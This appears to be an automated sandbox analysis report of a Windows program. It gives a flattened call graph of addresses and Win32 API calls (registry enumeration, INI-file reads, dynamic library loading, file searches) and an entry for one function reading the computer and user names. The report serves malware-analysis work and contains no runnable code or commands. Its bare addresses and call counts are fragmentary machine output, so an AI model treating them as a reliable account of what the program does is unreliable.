                                                                            execution_graph 34003 40fc40 70 API calls 34178 403640 21 API calls 34004 427fa4 42 API calls 34179 412e43 _endthreadex 34180 425115 76 API calls __fprintf_l 34181 43fe40 133 API calls 34007 425115 83 API calls __fprintf_l 34008 401445 memcpy memcpy DialogBoxParamA 34009 440c40 34 API calls 33227 444c4a 33246 444e38 33227->33246 33229 444c56 GetModuleHandleA 33230 444c68 __set_app_type __p__fmode __p__commode 33229->33230 33232 444cfa 33230->33232 33233 444d02 __setusermatherr 33232->33233 33234 444d0e 33232->33234 33233->33234 33247 444e22 _controlfp 33234->33247 33236 444d13 _initterm __getmainargs _initterm 33237 444d6a GetStartupInfoA 33236->33237 33239 444d9e GetModuleHandleA 33237->33239 33248 40cf44 33239->33248 33243 444dcf _cexit 33245 444e04 33243->33245 33244 444dc8 exit 33244->33243 33246->33229 33247->33236 33299 404a99 LoadLibraryA 33248->33299 33250 40cf60 33251 40cf64 33250->33251 33307 410d0e 33250->33307 33251->33243 33251->33244 33253 40cf6f 33311 40ccd7 ??2@YAPAXI 33253->33311 33255 40cf9b 33325 407cbc 33255->33325 33260 40cfc4 33344 409825 memset 33260->33344 33261 40cfd8 33349 4096f4 memset 33261->33349 33266 40d181 ??3@YAXPAX 33268 40d1b3 33266->33268 33269 40d19f DeleteObject 33266->33269 33267 407e30 _strcmpi 33270 40cfee 33267->33270 33373 407948 free free 33268->33373 33269->33268 33272 40cff2 RegDeleteKeyA 33270->33272 33273 40d007 EnumResourceTypesA 33270->33273 33272->33266 33275 40d047 33273->33275 33276 40d02f MessageBoxA 33273->33276 33274 40d1c4 33374 4080d4 free 33274->33374 33278 40d0a0 CoInitialize 33275->33278 33354 40ce70 33275->33354 33276->33266 33371 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33371 33281 40d1cd 33375 407948 free free 33281->33375 33283 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33372 40c256 PostMessageA 33283->33372 33285 40d061 ??3@YAXPAX 33285->33268 33288 40d084 DeleteObject 33285->33288 33286 40d09e 33286->33278 33288->33268 33291 40d0f9 GetMessageA 33292 40d17b CoUninitialize 33291->33292 33293 40d10d 33291->33293 33292->33266 33294 40d113 TranslateAccelerator 33293->33294 33296 40d145 IsDialogMessage 33293->33296 33297 40d139 IsDialogMessage 33293->33297 33294->33293 33295 40d16d GetMessageA 33294->33295 33295->33292 33295->33294 33296->33295 33298 40d157 TranslateMessage DispatchMessageA 33296->33298 33297->33295 33297->33296 33298->33295 33300 404ac4 GetProcAddress 33299->33300 33301 404aec 33299->33301 33302 404ad4 33300->33302 33303 404add FreeLibrary 33300->33303 33305 404b13 33301->33305 33306 404afc MessageBoxA 33301->33306 33302->33303 33303->33301 33304 404ae8 33303->33304 33304->33301 33305->33250 33306->33250 33308 410d17 LoadLibraryA 33307->33308 33309 410d3c 33307->33309 33308->33309 33310 410d2b GetProcAddress 33308->33310 33309->33253 33310->33309 33312 40cd08 ??2@YAPAXI 33311->33312 33314 40cd26 33312->33314 33316 40cd2d 33312->33316 33383 404025 6 API calls 33314->33383 33317 40cd66 33316->33317 33318 40cd59 DeleteObject 33316->33318 33376 407088 33317->33376 33318->33317 33320 40cd6b 33379 4019b5 33320->33379 33323 4019b5 strncat 33324 40cdbf _mbscpy 33323->33324 33324->33255 33385 407948 free free 33325->33385 33327 407e04 33386 407a55 33327->33386 33330 407a1f malloc memcpy free free 33332 407cf7 33330->33332 33331 407ddc 33331->33327 33391 407a1f 33331->33391 33332->33327 33332->33330 33332->33331 33334 407d83 33332->33334 33335 407d7a free 33332->33335 33389 40796e 7 API calls 33332->33389 33334->33332 33390 406f30 malloc memcpy free 33334->33390 33335->33332 33340 407e30 33342 407e38 33340->33342 33343 407e57 33340->33343 33341 407e41 _strcmpi 33341->33342 33341->33343 33342->33341 33342->33343 33343->33260 33343->33261 33399 4097ff 33344->33399 33346 409854 33404 409731 33346->33404 33350 4097ff 3 API calls 33349->33350 33351 409723 33350->33351 33424 40966c 33351->33424 33438 4023b2 33354->33438 33360 40ced3 33522 40cdda 7 API calls 33360->33522 33361 40cece 33364 40cf3f 33361->33364 33475 40c3d0 memset GetModuleFileNameA strrchr 33361->33475 33364->33285 33364->33286 33367 40ceed 33501 40affa 33367->33501 33371->33283 33372->33291 33373->33274 33374->33281 33375->33251 33384 406fc7 memset _mbscpy 33376->33384 33378 40709f CreateFontIndirectA 33378->33320 33380 4019e1 33379->33380 33381 4019c2 strncat 33380->33381 33382 4019e5 memset LoadIconA 33380->33382 33381->33380 33382->33323 33383->33316 33384->33378 33385->33332 33387 407a65 33386->33387 33388 407a5b free 33386->33388 33387->33340 33388->33387 33389->33332 33390->33334 33392 407a38 33391->33392 33393 407a2d free 33391->33393 33398 406f30 malloc memcpy free 33392->33398 33396 407a44 33393->33396 33395 407a43 33395->33396 33397 40796e 7 API calls 33396->33397 33397->33327 33398->33395 33415 406f96 GetModuleFileNameA 33399->33415 33401 409805 strrchr 33402 409814 33401->33402 33403 409817 _mbscat 33401->33403 33402->33403 33403->33346 33416 44b090 33404->33416 33409 40930c 3 API calls 33410 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33409->33410 33411 4097c5 LoadStringA 33410->33411 33412 4097db 33411->33412 33412->33411 33413 4097f3 33412->33413 33423 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33412->33423 33413->33266 33415->33401 33417 40973e _mbscpy _mbscpy 33416->33417 33418 40930c 33417->33418 33419 44b090 33418->33419 33420 409319 memset GetPrivateProfileStringA 33419->33420 33421 409374 33420->33421 33422 409364 WritePrivateProfileStringA 33420->33422 33421->33409 33422->33421 33423->33412 33434 406f81 GetFileAttributesA 33424->33434 33426 409675 33427 4096ee 33426->33427 33428 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33426->33428 33427->33267 33435 409278 GetPrivateProfileStringA 33428->33435 33430 4096c9 33436 409278 GetPrivateProfileStringA 33430->33436 33432 4096da 33437 409278 GetPrivateProfileStringA 33432->33437 33434->33426 33435->33430 33436->33432 33437->33427 33524 409c1c 33438->33524 33441 401e69 memset 33563 410dbb 33441->33563 33444 401ec2 33587 4070e3 strlen _mbscat _mbscpy _mbscat 33444->33587 33445 401ed4 33576 406f81 GetFileAttributesA 33445->33576 33448 401ee6 strlen strlen 33450 401f15 33448->33450 33451 401f28 33448->33451 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33450->33588 33577 406f81 GetFileAttributesA 33451->33577 33454 401f35 33578 401c31 33454->33578 33457 401f75 33459 402165 33457->33459 33460 401f9c memset 33457->33460 33458 401c31 5 API calls 33458->33457 33462 402195 ExpandEnvironmentStringsA 33459->33462 33463 4021a8 _strcmpi 33459->33463 33589 410b62 RegEnumKeyExA 33460->33589 33595 406f81 GetFileAttributesA 33462->33595 33463->33360 33463->33361 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33472 401fc9 33465->33472 33590 410b1e 33466->33590 33469 402076 memset memset strlen strlen 33469->33472 33470 4070e3 strlen _mbscat _mbscpy _mbscat 33470->33472 33471 4020dd strlen strlen 33471->33472 33472->33459 33472->33465 33472->33469 33472->33470 33472->33471 33473 406f81 GetFileAttributesA 33472->33473 33474 402167 _mbscpy 33472->33474 33594 410b62 RegEnumKeyExA 33472->33594 33473->33472 33474->33459 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33613 33480->33479 33606 409b31 33481->33606 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33616 406c62 LoadCursorA SetCursor 33486->33616 33488 40ba8c 33617 403c16 33488->33617 33683 404734 33488->33683 33691 404785 33488->33691 33694 4107f1 33488->33694 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33697 40b5e5 10 API calls 33492->33697 33493 40bafa SetCursor 33493->33367 33495->33493 33496 40baf1 qsort 33495->33496 33496->33493 33987 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33501->33987 33503 40b00e 33504 40b016 33503->33504 33505 40b01f GetStdHandle 33503->33505 33988 406d1a CreateFileA 33504->33988 33507 40b01c 33505->33507 33508 40b035 33507->33508 33509 40b12d 33507->33509 33989 406c62 LoadCursorA SetCursor 33508->33989 33993 406d77 9 API calls 33509->33993 33512 40b136 33523 40c580 28 API calls 33512->33523 33513 40b042 33514 40b087 33513->33514 33520 40b0a1 33513->33520 33990 40a57c strlen WriteFile 33513->33990 33514->33520 33991 40a699 12 API calls 33514->33991 33517 40b0d6 33518 40b116 CloseHandle 33517->33518 33519 40b11f SetCursor 33517->33519 33518->33519 33519->33512 33520->33517 33992 406d77 9 API calls 33520->33992 33522->33361 33523->33364 33536 409a32 33524->33536 33527 409c80 memcpy memcpy 33530 409cda 33527->33530 33528 408db6 12 API calls 33528->33530 33529 409d18 ??2@YAPAXI ??2@YAPAXI 33531 409d54 ??2@YAPAXI 33529->33531 33534 409d8b 33529->33534 33530->33527 33530->33528 33530->33529 33531->33534 33546 409b9c 33534->33546 33535 4023c1 33535->33441 33537 409a44 33536->33537 33538 409a3d ??3@YAXPAX 33536->33538 33539 409a52 33537->33539 33540 409a4b ??3@YAXPAX 33537->33540 33538->33537 33541 409a63 33539->33541 33542 409a5c ??3@YAXPAX 33539->33542 33540->33539 33543 409a83 ??2@YAPAXI ??2@YAPAXI 33541->33543 33544 409a73 ??3@YAXPAX 33541->33544 33545 409a7c ??3@YAXPAX 33541->33545 33542->33541 33543->33527 33544->33545 33545->33543 33547 407a55 free 33546->33547 33548 409ba5 33547->33548 33549 407a55 free 33548->33549 33550 409bad 33549->33550 33551 407a55 free 33550->33551 33552 409bb5 33551->33552 33553 407a55 free 33552->33553 33554 409bbd 33553->33554 33555 407a1f 4 API calls 33554->33555 33556 409bd0 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bda 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409be4 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409bee 33561->33562 33562->33535 33564 410d0e 2 API calls 33563->33564 33565 410dca 33564->33565 33566 410dfd memset 33565->33566 33596 4070ae 33565->33596 33569 410e1d 33566->33569 33570 410e7f _mbscpy 33569->33570 33599 410d3d _mbscpy 33569->33599 33571 401e9e strlen strlen 33570->33571 33571->33444 33571->33445 33573 410e5b 33600 410add RegQueryValueExA 33573->33600 33575 410e73 33575->33570 33576->33448 33577->33454 33579 401c4c 33578->33579 33586 401ca1 33579->33586 33601 410add RegQueryValueExA 33579->33601 33581 401c6a 33582 401c71 strchr 33581->33582 33581->33586 33583 401c85 strchr 33582->33583 33582->33586 33584 401c94 33583->33584 33583->33586 33602 406f06 strlen 33584->33602 33586->33457 33586->33458 33587->33445 33588->33451 33589->33472 33591 410b34 33590->33591 33592 410b4c 33591->33592 33605 410add RegQueryValueExA 33591->33605 33592->33472 33594->33472 33595->33463 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33566 33598->33571 33599->33573 33600->33575 33601->33581 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33586 33605->33592 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33485 33615 409868 SendMessageA 33611->33615 33613->33481 33614->33609 33615->33610 33616->33488 33618 4107f1 FreeLibrary 33617->33618 33619 403c30 LoadLibraryA 33618->33619 33620 403c74 33619->33620 33621 403c44 GetProcAddress 33619->33621 33623 4107f1 FreeLibrary 33620->33623 33621->33620 33622 403c5e 33621->33622 33622->33620 33627 403c6b 33622->33627 33624 403c7b 33623->33624 33625 404734 3 API calls 33624->33625 33626 403c86 33625->33626 33698 4036e5 33626->33698 33627->33624 33630 4036e5 27 API calls 33631 403c9a 33630->33631 33632 4036e5 27 API calls 33631->33632 33633 403ca4 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403cae 33634->33635 33710 4085d2 33635->33710 33641 403cd2 33643 403cf7 33641->33643 33862 402bd1 37 API calls 33641->33862 33644 403d1c 33643->33644 33863 402bd1 37 API calls 33643->33863 33745 402c5d 33644->33745 33648 4070ae GetVersionExA 33649 403d31 33648->33649 33651 403d61 33649->33651 33864 402b22 42 API calls 33649->33864 33653 403d97 33651->33653 33865 402b22 42 API calls 33651->33865 33654 403dcd 33653->33654 33866 402b22 42 API calls 33653->33866 33757 410808 33654->33757 33658 404785 FreeLibrary 33659 403de8 33658->33659 33761 402fdb 33659->33761 33662 402fdb 29 API calls 33663 403e00 33662->33663 33773 4032b7 33663->33773 33672 403e3b 33674 403e73 33672->33674 33675 403e46 _mbscpy 33672->33675 33820 40fb00 33674->33820 33868 40f334 333 API calls 33675->33868 33684 404785 FreeLibrary 33683->33684 33685 40473b LoadLibraryA 33684->33685 33686 40474c GetProcAddress 33685->33686 33687 40476e 33685->33687 33686->33687 33688 404764 33686->33688 33689 404781 33687->33689 33690 404785 FreeLibrary 33687->33690 33688->33687 33689->33490 33690->33689 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33490 33693->33692 33695 410807 33694->33695 33696 4107fc FreeLibrary 33694->33696 33695->33490 33696->33695 33697->33492 33699 4037c5 33698->33699 33700 4036fb 33698->33700 33699->33630 33869 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33700->33869 33702 40370e 33702->33699 33703 403716 strchr 33702->33703 33703->33699 33704 403730 33703->33704 33870 4021b6 memset 33704->33870 33706 40373f _mbscpy _mbscpy strlen 33707 4037a4 _mbscpy 33706->33707 33708 403789 sprintf 33706->33708 33871 4023e5 16 API calls 33707->33871 33708->33707 33711 4085e2 33710->33711 33872 4082cd 11 API calls 33711->33872 33713 4085ec 33714 403cba 33713->33714 33715 40860b memset 33713->33715 33722 40821d 33714->33722 33874 410b62 RegEnumKeyExA 33715->33874 33717 408637 33717->33714 33718 40865c memset 33717->33718 33876 40848b 10 API calls 33717->33876 33877 410b62 RegEnumKeyExA 33717->33877 33875 410add RegQueryValueExA 33718->33875 33723 40823f 33722->33723 33724 403cc6 33723->33724 33725 408246 memset 33723->33725 33730 4086e0 33724->33730 33878 410b62 RegEnumKeyExA 33725->33878 33727 40826f 33727->33724 33879 4080ed 11 API calls 33727->33879 33880 410b62 RegEnumKeyExA 33727->33880 33881 4045db 33730->33881 33732 4088ef 33889 404656 33732->33889 33736 408737 wcslen 33736->33732 33742 40876a 33736->33742 33737 40877a wcsncmp 33737->33742 33739 404734 3 API calls 33739->33742 33740 404785 FreeLibrary 33740->33742 33741 408812 memset 33741->33742 33743 40883c memcpy wcschr 33741->33743 33742->33732 33742->33737 33742->33739 33742->33740 33742->33741 33742->33743 33744 4088c3 LocalFree 33742->33744 33892 40466b _mbscpy 33742->33892 33743->33742 33744->33742 33746 402c7a 33745->33746 33747 402d9a 33746->33747 33748 402c87 memset 33746->33748 33747->33648 33893 410b62 RegEnumKeyExA 33748->33893 33750 410b1e RegQueryValueExA 33751 402ce4 memset sprintf 33750->33751 33754 402cb2 33751->33754 33752 402d3a sprintf 33752->33754 33754->33747 33754->33750 33754->33752 33894 402bd1 37 API calls 33754->33894 33895 402bd1 37 API calls 33754->33895 33896 410b62 RegEnumKeyExA 33754->33896 33758 410816 33757->33758 33759 4107f1 FreeLibrary 33758->33759 33760 403ddd 33759->33760 33760->33658 33762 402ff9 33761->33762 33763 403006 memset 33762->33763 33764 403122 33762->33764 33897 410b62 RegEnumKeyExA 33763->33897 33764->33662 33766 410b1e RegQueryValueExA 33767 403058 memset sprintf 33766->33767 33771 403033 33767->33771 33768 4030a2 memset 33898 410b62 RegEnumKeyExA 33768->33898 33771->33764 33771->33766 33771->33768 33772 410b62 RegEnumKeyExA 33771->33772 33899 402db3 24 API calls 33771->33899 33772->33771 33774 4032d5 33773->33774 33775 4033a9 33773->33775 33900 4021b6 memset 33774->33900 33788 4034e4 memset memset 33775->33788 33777 4032e1 33901 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33777->33901 33779 4032ea 33780 4032f8 memset GetPrivateProfileSectionA 33779->33780 33902 4023e5 16 API calls 33779->33902 33780->33775 33785 40332f 33780->33785 33782 40339b strlen 33782->33775 33782->33785 33784 403350 strchr 33784->33785 33785->33775 33785->33782 33903 4021b6 memset 33785->33903 33904 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33785->33904 33905 4023e5 16 API calls 33785->33905 33789 410b1e RegQueryValueExA 33788->33789 33790 40353f 33789->33790 33791 40357f 33790->33791 33792 403546 _mbscpy 33790->33792 33796 403985 33791->33796 33906 406d55 strlen _mbscat 33792->33906 33794 403565 _mbscat 33907 4033f0 19 API calls 33794->33907 33908 40466b _mbscpy 33796->33908 33800 4039aa 33802 4039ff 33800->33802 33909 40f6e2 33800->33909 33925 40f460 12 API calls 33800->33925 33926 4038e8 21 API calls 33800->33926 33803 404785 FreeLibrary 33802->33803 33804 403a0b 33803->33804 33805 4037ca memset memset 33804->33805 33928 444551 memset 33805->33928 33808 4038e2 33808->33672 33867 40f334 333 API calls 33808->33867 33810 40382e 33811 406f06 2 API calls 33810->33811 33812 403843 33811->33812 33813 406f06 2 API calls 33812->33813 33814 403855 strchr 33813->33814 33815 403884 _mbscpy 33814->33815 33816 403897 strlen 33814->33816 33817 4038bf _mbscpy 33815->33817 33816->33817 33818 4038a4 sprintf 33816->33818 33937 4023e5 16 API calls 33817->33937 33818->33817 33822 40fb10 33820->33822 33821 403e7f 33830 40f96c 33821->33830 33822->33821 33823 40fb55 RegQueryValueExA 33822->33823 33823->33821 33824 40fb84 33823->33824 33825 404734 3 API calls 33824->33825 33826 40fb91 33825->33826 33826->33821 33827 40fc19 LocalFree 33826->33827 33828 40fbdd memcpy memcpy 33826->33828 33827->33821 33941 40f802 7 API calls 33828->33941 33831 4070ae GetVersionExA 33830->33831 33832 40f98d 33831->33832 33833 4045db 7 API calls 33832->33833 33837 40f9a9 33833->33837 33834 40fae6 33835 404656 FreeLibrary 33834->33835 33836 403e85 33835->33836 33842 4442ea memset 33836->33842 33837->33834 33838 40fa13 memset WideCharToMultiByte 33837->33838 33838->33837 33839 40fa43 _strnicmp 33838->33839 33839->33837 33840 40fa5b WideCharToMultiByte 33839->33840 33840->33837 33841 40fa88 WideCharToMultiByte 33840->33841 33841->33837 33843 410dbb 7 API calls 33842->33843 33844 444329 33843->33844 33942 40759e strlen strlen 33844->33942 33849 410dbb 7 API calls 33850 444350 33849->33850 33851 40759e 3 API calls 33850->33851 33852 44435a 33851->33852 33853 444212 64 API calls 33852->33853 33854 444366 memset memset 33853->33854 33855 410b1e RegQueryValueExA 33854->33855 33856 4443b9 ExpandEnvironmentStringsA strlen 33855->33856 33857 4443f4 _strcmpi 33856->33857 33858 4443e5 33856->33858 33859 403e91 33857->33859 33860 44440c 33857->33860 33858->33857 33859->33490 33861 444212 64 API calls 33860->33861 33861->33859 33862->33643 33863->33644 33864->33651 33865->33653 33866->33654 33867->33672 33868->33674 33869->33702 33870->33706 33871->33699 33873 40841c 33872->33873 33873->33713 33874->33717 33875->33717 33876->33717 33877->33717 33878->33727 33879->33727 33880->33727 33882 404656 FreeLibrary 33881->33882 33883 4045e3 LoadLibraryA 33882->33883 33884 404651 33883->33884 33885 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33883->33885 33884->33732 33884->33736 33886 40463d 33885->33886 33887 404643 33886->33887 33888 404656 FreeLibrary 33886->33888 33887->33884 33888->33884 33890 404666 33889->33890 33891 40465c FreeLibrary 33889->33891 33890->33641 33891->33890 33892->33742 33893->33754 33894->33752 33895->33754 33896->33754 33897->33771 33898->33771 33899->33771 33900->33777 33901->33779 33902->33780 33903->33784 33904->33785 33905->33785 33906->33794 33907->33791 33908->33800 33927 40466b _mbscpy 33909->33927 33911 40f6fa 33912 4045db 7 API calls 33911->33912 33913 40f708 33912->33913 33915 404734 3 API calls 33913->33915 33919 40f7e2 33913->33919 33914 404656 FreeLibrary 33916 40f7f1 33914->33916 33920 40f715 33915->33920 33917 404785 FreeLibrary 33916->33917 33918 40f7fc 33917->33918 33918->33800 33919->33914 33920->33919 33921 40f797 WideCharToMultiByte 33920->33921 33922 40f7b8 strlen 33921->33922 33923 40f7d9 LocalFree 33921->33923 33922->33923 33924 40f7c8 _mbscpy 33922->33924 33923->33919 33924->33923 33925->33800 33926->33800 33927->33911 33929 44458b 33928->33929 33930 40381a 33929->33930 33938 410add RegQueryValueExA 33929->33938 33930->33808 33936 4021b6 memset 33930->33936 33932 4445a4 33932->33930 33939 410add RegQueryValueExA 33932->33939 33934 4445c1 33934->33930 33940 444879 30 API calls 33934->33940 33936->33810 33937->33808 33938->33932 33939->33934 33940->33930 33941->33827 33943 4075c9 33942->33943 33944 4075bb _mbscat 33942->33944 33945 444212 33943->33945 33944->33943 33962 407e9d 33945->33962 33948 44424d 33949 444274 33948->33949 33950 444258 33948->33950 33970 407ef8 33948->33970 33951 407e9d 9 API calls 33949->33951 33983 444196 51 API calls 33950->33983 33958 4442a0 33951->33958 33953 407ef8 9 API calls 33953->33958 33954 4442ce 33980 407f90 33954->33980 33958->33953 33958->33954 33960 444212 64 API calls 33958->33960 33984 407e62 strcmp strcmp 33958->33984 33959 407f90 FindClose 33961 4442e4 33959->33961 33960->33958 33961->33849 33963 407f90 FindClose 33962->33963 33964 407eaa 33963->33964 33965 406f06 2 API calls 33964->33965 33966 407ebd strlen strlen 33965->33966 33967 407ee1 33966->33967 33968 407eea 33966->33968 33985 4070e3 strlen _mbscat _mbscpy _mbscat 33967->33985 33968->33948 33971 407f03 FindFirstFileA 33970->33971 33972 407f24 FindNextFileA 33970->33972 33973 407f3f 33971->33973 33974 407f46 strlen strlen 33972->33974 33975 407f3a 33972->33975 33973->33974 33979 407f7f 33973->33979 33977 407f76 33974->33977 33974->33979 33976 407f90 FindClose 33975->33976 33976->33973 33986 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33986 33979->33948 33981 407fa3 33980->33981 33982 407f99 FindClose 33980->33982 33981->33959 33982->33981 33983->33948 33984->33958 33985->33968 33986->33979 33987->33503 33988->33507 33989->33513 33990->33514 33991->33520 33992->33517 33993->33512 34011 411853 RtlInitializeCriticalSection memset 34012 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34187 40a256 13 API calls 34189 432e5b 17 API calls 34191 43fa5a 20 API calls 34014 401060 41 API calls 34194 427260 CloseHandle memset memset 34018 410c68 FindResourceA SizeofResource LoadResource LockResource 34196 405e69 14 API calls 34020 433068 15 API calls __fprintf_l 34198 414a6d 18 API calls 34199 43fe6f 134 API calls 34022 424c6d 15 API calls __fprintf_l 34200 426741 19 API calls 34024 440c70 17 API calls 34025 443c71 42 API calls 34028 427c79 24 API calls 34203 416e7e memset __fprintf_l 34032 42800b 47 API calls 34033 425115 85 API calls __fprintf_l 34206 41960c 61 API calls 34034 43f40c 122 API calls __fprintf_l 34037 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34038 43f81a 20 API calls 34040 414c20 memset memset 34041 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34210 414625 18 API calls 34211 404225 modf 34212 403a26 strlen WriteFile 34214 40422a 12 API calls 34218 427632 memset memset memcpy 34219 40ca30 59 API calls 34220 404235 26 API calls 34042 42ec34 61 API calls __fprintf_l 34043 425115 76 API calls __fprintf_l 34221 425115 77 API calls __fprintf_l 34223 44223a 38 API calls 34049 43183c 112 API calls 34224 44b2c5 _onexit __dllonexit 34229 42a6d2 memcpy __allrem 34051 405cda 60 API calls 34237 43fedc 138 API calls 34238 4116e1 16 API calls __fprintf_l 34054 4244e6 19 API calls 34056 42e8e8 127 API calls __fprintf_l 34057 4118ee RtlLeaveCriticalSection 34243 43f6ec 22 API calls 34059 425115 119 API calls __fprintf_l 34060 410cf3 EnumResourceNamesA 34246 4492f0 memcpy memcpy 34248 43fafa 18 API calls 34250 4342f9 15 API calls __fprintf_l 34061 4144fd 19 API calls 34252 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34253 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34256 443a84 _mbscpy 34258 43f681 17 API calls 34064 404487 22 API calls 34260 415e8c 16 API calls __fprintf_l 34068 411893 RtlDeleteCriticalSection __fprintf_l 34069 41a492 42 API calls 34264 403e96 34 API calls 34265 410e98 memset SHGetPathFromIDList SendMessageA 34071 426741 109 API calls __fprintf_l 34072 4344a2 18 API calls 34073 4094a2 10 API calls 34268 4116a6 15 API calls __fprintf_l 34269 43f6a4 17 API calls 34270 440aa3 20 API calls 34272 427430 45 API calls 34076 4090b0 7 API calls 34077 4148b0 15 API calls 34079 4118b4 RtlEnterCriticalSection 34080 4014b7 CreateWindowExA 34081 40c8b8 19 API calls 34083 4118bf RtlTryEnterCriticalSection 34277 42434a 18 API calls __fprintf_l 34279 405f53 12 API calls 34091 43f956 59 API calls 34093 40955a 17 API calls 34094 428561 36 API calls 34095 409164 7 API calls 34283 404366 19 API calls 34287 40176c ExitProcess 34290 410777 42 API calls 34100 40dd7b 51 API calls 34101 425d7c 16 API calls __fprintf_l 34292 43f6f0 25 API calls 34293 42db01 22 API calls 34102 412905 15 API calls __fprintf_l 34294 403b04 54 API calls 34295 405f04 SetDlgItemTextA GetDlgItemTextA 34296 44b301 ??3@YAXPAX 34299 4120ea 14 API calls 3 library calls 34300 40bb0a 8 API calls 34302 413f11 strcmp 34106 434110 17 API calls __fprintf_l 34109 425115 108 API calls __fprintf_l 34303 444b11 _onexit 34111 425115 76 API calls __fprintf_l 34114 429d19 10 API calls 34306 444b1f __dllonexit 34307 409f20 _strcmpi 34116 42b927 31 API calls 34310 433f26 19 API calls __fprintf_l 34311 44b323 FreeLibrary 34312 427f25 46 API calls 34313 43ff2b 17 API calls 34314 43fb30 19 API calls 34123 414d36 16 API calls 34125 40ad38 7 API calls 34316 433b38 16 API calls __fprintf_l 33994 44b33b 33995 44b344 ??3@YAXPAX 33994->33995 33996 44b34b 33994->33996 33995->33996 33997 44b354 ??3@YAXPAX 33996->33997 33998 44b35b 33996->33998 33997->33998 33999 44b364 ??3@YAXPAX 33998->33999 34000 44b36b 33998->34000 33999->34000 34001 44b374 ??3@YAXPAX 34000->34001 34002 44b37b 34000->34002 34001->34002 34129 426741 21 API calls 34130 40c5c3 123 API calls 34132 43fdc5 17 API calls 34317 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34135 4161cb memcpy memcpy memcpy memcpy 34322 43ffc8 18 API calls 34136 4281cc 15 API calls __fprintf_l 34324 4383cc 110 API calls __fprintf_l 34137 4275d3 41 API calls 34325 4153d3 22 API calls __fprintf_l 34138 444dd7 _XcptFilter 34330 4013de 15 API calls 34332 425115 111 API calls __fprintf_l 34333 43f7db 18 API calls 34336 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34140 4335ee 16 API calls __fprintf_l 34338 429fef 11 API calls 34141 444deb _exit _c_exit 34339 40bbf0 133 API calls 34144 425115 79 API calls __fprintf_l 34343 437ffa 22 API calls 34148 4021ff 14 API calls 34149 43f5fc 149 API calls 34344 40e381 9 API calls 34151 405983 40 API calls 34152 42b186 27 API calls __fprintf_l 34153 427d86 76 API calls 34154 403585 20 API calls 34156 42e58e 18 API calls __fprintf_l 34159 425115 75 API calls __fprintf_l 34161 401592 8 API calls 33200 410b92 33203 410a6b 33200->33203 33202 410bb2 33204 410a77 33203->33204 33205 410a89 GetPrivateProfileIntA 33203->33205 33208 410983 memset _itoa WritePrivateProfileStringA 33204->33208 33205->33202 33207 410a84 33207->33202 33208->33207 34348 434395 16 API calls 34163 441d9c memcmp 34350 43f79b 119 API calls 34164 40c599 42 API calls 34351 426741 87 API calls 34168 4401a6 21 API calls 34170 426da6 memcpy memset memset memcpy 34171 4335a5 15 API calls 34173 4299ab memset memset memcpy memset memset 34174 40b1ab 8 API calls 34356 425115 76 API calls __fprintf_l 34360 4113b2 18 API calls 2 library calls 34364 40a3b8 memset sprintf SendMessageA 33209 410bbc 33212 4109cf 33209->33212 33213 4109dc 33212->33213 33214 410a23 memset GetPrivateProfileStringA 33213->33214 33215 4109ea memset 33213->33215 33220 407646 strlen 33214->33220 33225 4075cd sprintf memcpy 33215->33225 33218 410a65 33219 410a0c WritePrivateProfileStringA 33219->33218 33221 40765a 33220->33221 33223 40765c 33220->33223 33221->33218 33222 4076a3 33222->33218 33223->33222 33226 40737c strtoul 33223->33226 33225->33219 33226->33223 34176 40b5bf memset memset _mbsicmp

                                                                            Executed Functions

                                                                            Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040832F
                                                                            • memset.MSVCRT ref: 00408343
                                                                            • memset.MSVCRT ref: 0040835F
                                                                            • memset.MSVCRT ref: 00408376
                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
